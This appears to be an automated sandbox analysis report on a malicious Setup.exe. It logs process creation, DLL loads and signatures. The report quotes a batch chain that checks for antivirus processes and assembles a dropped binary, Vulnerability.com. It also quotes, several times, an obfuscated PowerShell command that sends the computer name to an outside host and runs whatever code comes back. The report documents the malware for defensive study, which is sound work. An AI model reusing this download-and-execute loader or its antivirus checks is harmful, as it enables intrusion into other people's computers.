Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 302164
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Hentai
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ENOUGH" Golf
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 302164\Vulnerability.com + Tape + Naval + Offered + Rhode + Wiring + Tapes + Loc + Treasures + Determining + Tiny + Affects + Computing 302164\Vulnerability.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Achieved + ..\Indians + ..\Por + ..\Argentina + ..\Documentation + ..\Usda + ..\Standard + ..\Cdt v
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com Vulnerability.com v
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\Setup.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Pro Pro.cmd & Pro.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 302164	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Hentai	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "ENOUGH" Golf	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 302164\Vulnerability.com + Tape + Naval + Offered + Rhode + Wiring + Tapes + Loc + Treasures + Determining + Tiny + Affects + Computing 302164\Vulnerability.com	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Achieved + ..\Indians + ..\Por + ..\Argentina + ..\Documentation + ..\Usda + ..\Standard + ..\Cdt v	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com Vulnerability.com v	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: acgenral.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msacm32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: winmmbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: framedynos.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\extrac32.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: Setup.exe

Static file information: File size 73412279 > 1048576

Source: Setup.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2958235445.00000000077C4000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000011.00000002.2959149859.0000000007823000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb\| source: powershell.exe, 00000011.00000002.2966793248.0000000008790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2966793248.0000000008790000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000011.00000002.2958235445.00000000077CD000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Suspicious powershell command line found

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content;			Jump to behavior

Source: C:\Users\user\Desktop\Setup.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_03393738 push ebp; ret		17_2_03393EF8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 17_2_03393645 push ebx; iretd		17_2_033936DA

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Jump to dropped file

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com

Jump to dropped file

Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\Setup.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\302164\Vulnerability.com	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
